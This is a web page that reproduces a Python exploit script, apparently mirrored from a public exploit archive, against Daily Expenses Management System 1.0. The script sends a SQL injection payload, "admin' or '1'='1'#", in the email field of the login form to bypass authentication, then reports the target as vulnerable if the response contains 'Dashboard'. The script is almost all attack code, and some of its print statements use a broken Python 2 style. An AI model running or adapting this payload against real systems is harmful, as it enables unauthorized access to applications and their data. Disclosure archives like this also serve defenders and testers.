扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection # Exploit Author: Daniel Ortiz # Date: 2020-08-01 # Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Tested on: XAMPP Version 5.6.40 / Windows 10 # Software Link:https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html import sys import requests import urllib3 import re import time urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning) def make_request(url, payload): p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"} s = requests.Session() r = s.post(url, data=payload, proxies=p) return r if __name__ == '__main__': if len(sys.argv) != 2: print("[*] Daily Expenses Management System | username SQL injection") print("[*] usage: %sTARGET" % sys.argv[0]) print("[*] e.g: %s192.168.0.10" % sys.argv[0]) sys.exit(-1) TARGET = sys.argv[1] LOGIN_FORM = "http://%s/dets/" % TARGET # Step 1 - Bypass login form url = LOGIN_FORM p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} r = make_request(url, p1) print("[+] Endpoint: %s") % LOGIN_FORM print("[+] Making requests with payload: %s") % p1 if re.findall('Dashboard', r.text): print("[+] Target vulnerable") else: print("[-] Error !!!") |
体验盒子
